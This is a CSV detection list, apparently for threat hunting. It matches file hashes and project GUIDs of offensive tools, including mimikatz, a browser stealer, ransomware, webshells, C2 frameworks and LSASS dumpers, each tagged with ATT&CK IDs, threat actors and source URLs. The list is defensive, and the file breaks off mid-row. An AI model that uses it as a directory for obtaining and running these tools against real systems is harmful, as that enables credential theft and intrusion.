"*a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5*",".{0,1000}a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32418" "*a3fbc9a01ac82d10f92da72625f1a092817c5fad7a9b60917b811fab1ff8c97f*",".{0,1000}a3fbc9a01ac82d10f92da72625f1a092817c5fad7a9b60917b811fab1ff8c97f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","32422" "*A3h1nt/gimmeSH*",".{0,1000}A3h1nt\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. 
your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","32423" "*a4045cfd2b84fce0d46096b6dc9f82f8745907b5828a96b522da42cbd5f5563f*",".{0,1000}a4045cfd2b84fce0d46096b6dc9f82f8745907b5828a96b522da42cbd5f5563f.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","32424" "*a4058df23cf217a43482e2f6fa20e55ef9005d20713a6860a4974da0fe731e64*",".{0,1000}a4058df23cf217a43482e2f6fa20e55ef9005d20713a6860a4974da0fe731e64.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","32425" "*a4096945fcab171e791efcb38a767d5b532aa93862642f294eea91c934799219*",".{0,1000}a4096945fcab171e791efcb38a767d5b532aa93862642f294eea91c934799219.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32426" 
"*a40d64c15cb551bf428df95586a907b6d0efea97a05afceeac24230fd787ef0f*",".{0,1000}a40d64c15cb551bf428df95586a907b6d0efea97a05afceeac24230fd787ef0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32428" "*a40ff8a806b8b2c385cd85e3c9627b09fca054a23fe7168aed459098266cab42*",".{0,1000}a40ff8a806b8b2c385cd85e3c9627b09fca054a23fe7168aed459098266cab42.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#filehash","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","32429" "*a41186a797df9bf4cc912835c4226cbb57826693a67e5c5eb4e4eb0b2919843f*",".{0,1000}a41186a797df9bf4cc912835c4226cbb57826693a67e5c5eb4e4eb0b2919843f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32430" "*a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1*",".{0,1000}a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 
- T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32432" "*a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe*",".{0,1000}a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32435" "*a421db8d72e7cc2e9d64891c05a49d6a60aed15dc4650f26155aa560f93ecc80*",".{0,1000}a421db8d72e7cc2e9d64891c05a49d6a60aed15dc4650f26155aa560f93ecc80.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32436" "*a425fc824f3bf40f82faad797a69b0fc2556dc79579f566891e75ee00920f7c0*",".{0,1000}a425fc824f3bf40f82faad797a69b0fc2556dc79579f566891e75ee00920f7c0.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","32438" "*a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af*",".{0,1000}a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with 
the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32439" "*a43682fd04ffe7d7a41a4b9a1afeddda45f2a74cca6632bbf4d7d6c110e2ff80*",".{0,1000}a43682fd04ffe7d7a41a4b9a1afeddda45f2a74cca6632bbf4d7d6c110e2ff80.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","32441" "*a43bb6f7722fc5426cf74039935d60d648f085aa1f463ec94c32add776fa3928*",".{0,1000}a43bb6f7722fc5426cf74039935d60d648f085aa1f463ec94c32add776fa3928.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32442" "*a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083*",".{0,1000}a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","32443" "*a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23*",".{0,1000}a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","32444" "*a44a5e8e65266611d5845d88b43c9e4a9d84fe074fd18f48b50fb837fa6e429d*",".{0,1000}a44a5e8e65266611d5845d88b43c9e4a9d84fe074fd18f48b50fb837fa6e429d.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","32445" "*a451317248c1067c50ee91efa32c74d6e83b7110dadbe5120e41925adce76594*",".{0,1000}a451317248c1067c50ee91efa32c74d6e83b7110dadbe5120e41925adce76594.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32448" "*a45833f0ee2541c060b8154389fdca5cf5bd19f460352eae83c4fbe024edc803*",".{0,1000}a45833f0ee2541c060b8154389fdca5cf5bd19f460352eae83c4fbe024edc803.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","32449" "*a45aba3ece9369139d34d85d5024d057d98134cb72b23db28589cff428499763*",".{0,1000}a45aba3ece9369139d34d85d5024d057d98134cb72b23db28589cff428499763.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32450" "*A45C184F-F98F-4258-A928-BFF437034791*",".{0,1000}A45C184F\-F98F\-4258\-A928\-BFF437034791.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32451" "*a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588*",".{0,1000}a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32455" "*A46C9A13-145E-42C0-8CA6-CC920BF1D9F1*",".{0,1000}A46C9A13\-145E\-42C0\-8CA6\-CC920BF1D9F1.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#GUIDproject","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","32457" "*a46d2986f634a23bf7156290284914da2c25c35b9484c11e119cb2c2f5bd5c08*",".{0,1000}a46d2986f634a23bf7156290284914da2c25c35b9484c11e119cb2c2f5bd5c08.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32458" "*a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1*",".{0,1000}a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","32459" "*a48043a8756908a15c435bbab7ddcfc26d6462fbba9f7597e581535743c8a3cf*",".{0,1000}a48043a8756908a15c435bbab7ddcfc26d6462fbba9f7597e581535743c8a3cf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32462" "*a48708d0c27daec437448a1363e63b53d518cf00e60d701fe5f6292ffab1df00*",".{0,1000}a48708d0c27daec437448a1363e63b53d518cf00e60d701fe5f6292ffab1df00.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","32464" "*a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4*",".{0,1000}a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - 
T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","32465" "*a489c0ab41646b1e2c65390196f453b4aa04ab76133711a264ae33ab8bca0026*",".{0,1000}a489c0ab41646b1e2c65390196f453b4aa04ab76133711a264ae33ab8bca0026.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32466" "*a492bbf95a3db658f1f1114789c481e91374623bb6484c998e1f1487e0ef717e*",".{0,1000}a492bbf95a3db658f1f1114789c481e91374623bb6484c998e1f1487e0ef717e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32469" "*a4936a59be5cbe4f0ccba2dcc55dfdbe453cc38b60de5732849776683cd85e17*",".{0,1000}a4936a59be5cbe4f0ccba2dcc55dfdbe453cc38b60de5732849776683cd85e17.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32470" "*a494bbc30a636c51bae886c742f6a46a9ab049c26c4143d186cbc7ee5a55099a*",".{0,1000}a494bbc30a636c51bae886c742f6a46a9ab049c26c4143d186cbc7ee5a55099a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that 
allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32471" "*a4a32b65f7452ee26bb5be301620461938d46f44455a5be4e872a6dda8c6150e*",".{0,1000}a4a32b65f7452ee26bb5be301620461938d46f44455a5be4e872a6dda8c6150e.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","32473" "*a4a394d85597168c85a244e6ec4d8ff7c8a92f3938bf40dac9ba5a0ce9803d05*",".{0,1000}a4a394d85597168c85a244e6ec4d8ff7c8a92f3938bf40dac9ba5a0ce9803d05.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32474" "*a4b26a3d01e61601dbc2a82f6301e122847e57be910cf80d77ba83c1ed290b6d*",".{0,1000}a4b26a3d01e61601dbc2a82f6301e122847e57be910cf80d77ba83c1ed290b6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32476" "*a4b8bd1215b90dccd2c0d3241bbac4bad1430eaceb342f80097f0e3b93c2ab9a*",".{0,1000}a4b8bd1215b90dccd2c0d3241bbac4bad1430eaceb342f80097f0e3b93c2ab9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32477" "*a4cba56cfdae80bcfad6745fb2ea7ffe407534d449414b198b5eea43239ba43c*",".{0,1000}a4cba56cfdae80bcfad6745fb2ea7ffe407534d449414b198b5eea43239ba43c.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32480" 
"*a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34*",".{0,1000}a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","32481" "*a4ce76854c9c0a5ffd167bfef3e659a95d37d605767b71435b7539461e3185ae*",".{0,1000}a4ce76854c9c0a5ffd167bfef3e659a95d37d605767b71435b7539461e3185ae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32482" "*A4D129236E794B44A883AA46B8722E7190DBAC0F0AED2FEBB087C93C81CA6383*",".{0,1000}A4D129236E794B44A883AA46B8722E7190DBAC0F0AED2FEBB087C93C81CA6383.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32483" "*a4d2d5e38ec0bf86be4572151ceac1cf5b8eed54eae425b89f5274ee9dfc331e*",".{0,1000}a4d2d5e38ec0bf86be4572151ceac1cf5b8eed54eae425b89f5274ee9dfc331e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32484" 
"*a4d92518de887211fcc6d0f0c011336140fa14d69a505223947a088cec3a9c0f*",".{0,1000}a4d92518de887211fcc6d0f0c011336140fa14d69a505223947a088cec3a9c0f.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#filehash","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","32485" "*a4e7ad2bf439d52663283ff7925e7935d3e770f95fa399bb99aa0adee0945c59*",".{0,1000}a4e7ad2bf439d52663283ff7925e7935d3e770f95fa399bb99aa0adee0945c59.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32488" "*a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4*",".{0,1000}a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32489" "*a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f*",".{0,1000}a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32491" "*a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62*",".{0,1000}a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - 